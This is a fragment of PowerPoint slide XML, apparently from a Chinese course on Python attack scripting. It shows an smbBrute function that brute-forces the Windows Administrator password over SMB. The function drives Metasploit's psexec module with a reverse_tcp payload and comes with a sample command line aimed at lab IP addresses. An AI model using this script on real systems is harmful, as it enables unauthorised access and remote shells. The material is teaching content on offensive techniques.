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5" r:id="rId4"/>
    <p:sldId id="316" r:id="rId5"/>
    <p:sldId id="288" r:id="rId6"/>
    <p:sldId id="320" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="322" r:id="rId9"/>
    <p:sldId id="323" r:id="rId10"/>
    <p:sldId id="324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80" y="-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：针对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用户名和密码组合暴破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83567" y="3092503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2320E71-0B09-41CE-902E-580999D89832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2983567" y="1983232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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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C891C38-0C8E-4773-ADC2-85C735951C3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2983567" y="4313118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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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xmlns="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8611994D-59C1-473C-AA77-4C2C745AC31F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823733" y="2065741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0820B6B3-4FEB-4D10-ABCA-7E88F6779581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3799540" y="3162412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AE5B3BB9-3932-474C-90CF-E327073D0EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3804098" y="4362805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201420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针对用户名和密码组合暴破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8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3190000"/>
            <a:ext cx="9754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当攻击者成功的启动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ms08-067_netapi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exploit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攻击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目标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受害者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的时候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，管理员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安装最新的安全补丁能轻松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的阻止攻击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。因此，脚本将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使用第二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个攻击向量。它将通过用户名和密码的组合暴力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破解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服务，获得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对主机的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远程执行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程序的权限。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1900043"/>
            <a:ext cx="9754421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smbBrute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passwdFile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username = 'Administrator'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pF = open(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passwdFile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'r')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for password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pF.readlines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password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password.strip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('\n').strip('\r')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('use exploit/windows/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psexec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SMBUser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(username)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8791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618500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SMBPass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(password)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RHOST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PAYLOAD windows/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reverse_tcp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LPORT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LHOST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('exploit -j -z\n')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8791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1" y="2455215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smbBrute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接受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配置文件，目标主机，一系列密码的文件，本地地址和本地端口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输入，然后进行监听。它设置用户名为默认的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管理员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administrator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然后打开密码文件。对于文件的每一个密码，函数将建立一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配置文件。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如果一个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用户名和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密码组合成功了，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exploit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将会启动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攻击荷载反向连接到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本地的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地址和端口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8791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1" y="2455215"/>
            <a:ext cx="9754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使用方法：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python3.5 5.1.8.py </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="504000" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN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51" y="3611901"/>
            <a:ext cx="7409292" cy="24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1" y="2455215"/>
            <a:ext cx="9754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sudo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python3.5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5.1.8.py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-H 192.168.24.78 -l 192.168.24.14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–p 33333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-F ./pass.txt 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zh-CN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2836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2457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针对用户名和密码组合暴破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81" y="3355982"/>
            <a:ext cx="8644390" cy="13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81" y="4671958"/>
            <a:ext cx="8644390" cy="13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310</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>47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jiayou</cp:lastModifiedBy>
  <cp:revision>190</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-05T01:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-12T15:58:36Z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